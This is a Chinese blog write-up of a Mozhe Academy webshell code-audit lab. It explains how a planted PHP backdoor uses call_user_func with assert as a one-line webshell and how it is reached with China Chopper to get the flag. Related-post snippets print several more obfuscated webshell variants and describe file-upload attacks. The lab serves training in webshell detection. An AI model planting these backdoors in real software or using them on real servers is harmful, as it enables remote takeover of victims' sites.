墨者学院 - WebShell代码分析溯源(第5题)

最新推荐文章于 2021-12-29 20:32:27 发布
原创 最新推荐文章于 2021-12-29 20:32:27 发布 · 876 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了WebShell中的回调函数利用,特别是通过assert函数形成的一句话木马。提到了菜刀连接的使用,如ip/www/Exception.php?POST=assert,并给出了相关密码。还推荐了回调函数的参考文章,并详细解释了call_user_func()函数的工作原理,说明了如何构造并利用assert进行木马触发。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

一个个看,,,找到该文件,经典的回调函数形式

菜刀连接,
ip/www/Exception.php?POST=assert
密码为assert


得到key

关于回调函数可参考此文章

https://blog.youkuaiyun.com/qq_24196029/article/details/78118680

 

 

<?php
error_reporting(0);
call_user_func('assert', $_REQUEST['joker']);
?>

用法: http://www.xxx.com/4.php

菜刀连接用法: http://www.xxx.com/4.php

密码:joker

详解:call_user_func()函数把第一个参数作为回调函数调用,也就是说assert是被调用的回调函数,其余参数是回调函数的参数。

这样的话就直接构成了  assert($_REQUEST['joker']) 这样的一句话木马,直接用菜刀链接即可

最低0.47元/天 解锁文章

200万优质内容无限畅学
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 878
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - WebShell代码分析溯源(第7)
多崎巡礼的博客
08-05 748
代码审查 在random_int.php 前排 发现以下回调后门 &lt;?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 &lt;?php $e = $_REQUEST['...
墨者学院-WebShell代码分析溯源(5)
JimWu的博客
09-04 437
WebShell代码分析溯源(5) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.审查php文件后发现了一个疑似木马的文件Exception.php。 3.打开文件,分析代码,有点像一句话木马。 分析后,发现call_user_func属于回调函数,第一个参数为函数,第二个参数作为回...
墨者学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 804
&lt;?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?&gt; assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
墨者学院 - WebShell代码分析溯源(第9)
多崎巡礼的博客
08-05 895
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。     &lt;?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']); ...
墨者学院-WebShell文件上传分析溯源(第2)
JimWu的博客
09-05 977
WebShell文件上传分析溯源(第2) 难易程度:★★★★★ 目类型:文件上传 使用工具:FireFox浏览器、御剑、burpsuite、菜刀 1.打开靶场,我们没发现能到二级目录的按钮。 2.打开御剑,开始目录扫描 发现两个上传文件的地址。/admin/upload1.php和/admin/upload2.php 3.打开upload1.php,提示无权访问,跳到了upload2.php...
墨者学院 - WebShell文件上传分析溯源(第2)
多崎巡礼的博客
08-01 2406
御剑扫描网址可以得到 ip/admin/upload1.php,ip/admin/upload2.php 尝试 ip/admin/upload.php,发现直接跳转upload1.php,没有访问权限继续跳转upload2.php burpsuite抓包,截取upload.php,查看源码得到 forward一下 将uploadmd5更改为 upload_file.php 发送给re...
墨者学院WebShell文件上传漏洞分析溯源
gudugeji的博客
10-22 462
1.第一 编写一句话木马,然后上传文件,改文件不可上传,改后缀为php5 然后用菜刀连接 连接成功打开html,得到flag 2.第二 上传shell图片,burp抓包,改jpg为php,点Forward,然后菜刀连接,同1 ...
墨者学院--Webshell代码分析溯源5
weixin_44382289的博客
09-20 199
1.根据意,下载源码,目就是要我们分析代码,查找木马; 2.由于本人太闲,以及目不复杂,所以使用人眼识别法,发现exception.php文件存在木马代码; 3.call_user_fun函数可以将$_REQUEST[‘assert’]回调assert函数,构成一句话木马; 有兴趣的可以去了解一下,可以使用回调函数躲避检测。 4.这就十分明了了,上刀;密码assert;成功!得到key ...
墨者 - WebShell代码分析溯源(5)
吃肉唐僧的博客
07-12 267
下载文件后,发现木马文件 发现类似木马的语句 查看php手册:https://php.net/manual/zh/function.call-user-func.php 解释写着第一个参数callback是被调用的回调函数,其余参数是回调函数的参数。 就是说构成assert($REQUEST['assert']),密码为assert 直接菜刀无惧链接 拿到ke...
墨者学院 - WebShell代码分析溯源(第10)
多崎巡礼的博客
08-05 572
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。   &lt;?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...
墨者学院-WebShell代码分析溯源(第11)
JimWu的博客
09-04 312
WebShell代码分析溯源(第11) 难易程度:★★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载备份文件。 2.解压文件,分析代码。 3.从代码中,知道当1=GET.fpz287时会生成t.php,所以我们要在url中输入。 我们继续分析一下代码,能看出代码中运用了str_replace函数。 该函数会把以其他字符替换字符串中的一些字符,在代码中就是把i...
墨者学院-WebShell代码分析溯源(第4)
JimWu的博客
09-04 449
WebShell代码分析溯源(第4) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.发现hack文件夹里有可疑文件bin.php 3.打开发现确实是一句话木马 能发现代码运用了回调函数,只有我们在菜刀连接时e输入的参数等于assert的密文,才能构成一句话木马病毒。 我们通过base64把assert,密文为YXNzZX...
墨者学院-WebShell代码分析溯源(第9)
JimWu的博客
09-04 266
WebShell代码分析溯源(第9) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.根据最后的修改时间,确定可疑的文件。 3.打开文件,发现是一句话木马病毒。 register_shutdown_function函数是在代码执行完成后执行的,所以当e=assert时,把$_REQUES...
墨者学院-WebShell代码分析溯源(第6)
JimWu的博客
09-04 298
WebShell代码分析溯源(第6) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀、记事本 1.访问网页,下载网页源代码。 2.查看每个文件夹的源代码,发现在/Assets/upload中有可疑文件,php文件想冒充jpg。 3.打开文件,发现果然是一句话木马。 分析代码,了解到array_map属于回调函数。 base64_decode(e)为函数,e)为函数,...
墨者学院-WebShell代码分析溯源(第3)
JimWu的博客
09-04 471
WebShell代码分析溯源(第3) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.审查后,能发现js文件夹里有个与众不同的文件,就是jquery1.42.min.php。 3.打开该文件,发现果然是变种一句话木马。 $g[1]=s chr('116')调用ASCII表,查找该表,知道116对应的是t 所以拼接起来就是$g...
墨者学院-WebShell代码分析溯源(第7)
JimWu的博客
09-04 340
WebShell代码分析溯源(第7) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀、Adobe Dreamweaver CS6 1.访问网页,下载网页源代码。 2.审查文件后,发现random_int.php文件可疑。 3.打开文件后,确定这是一个一句话木马病毒 。 assert通过base64加密后为YXNzZXJ0,当密码为POST的返回到函数构成一句话木马。...
墨者学院WebShell代码分析溯源(第6)
vergilben的学习日记
04-03 9661
墨者学院WebShell代码分析溯源(第6) 进入环境: 下载并分析源码: 在如上路径中发现pic3.jpg.php,打开如下所示: 图中箭头指的很明显,是一句话木马,需要用到菜刀连接,但是后面很明显与base64有关,所以,我们需要一个指令来让它变成(xxx,一句话木马),思考一下这里应该是个插入语句,我们平常用到的,是eval函数,但我们看一下eval函数的解释: 所以eval函数是无...
墨者WebShell文件上传漏洞分析溯源(5)
zr1213159840的博客
12-29 573
点击访问后台,能找到一个后台登录的页面 这个地方可以输入几个密码试试,发现是账号以及密码都是admin。(其实应该爆破的,爆破方法另写一篇)使用admin登录后进入后台 点开文章管理,点击添加文章 能从页面上看出来,这是一个asp的页面,我们上传一个asp木马。但是我们首先将其命名为xxx.jpg,然后点击提交后,能看到上传的位置: 记住这段位置,点击数据备份 点击备份数据 能看到这个位置,我们使用蚁剑访问 翻到如图位置,拿到key ...
墨者学院WebShell文件上传漏洞分析溯源(第1)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值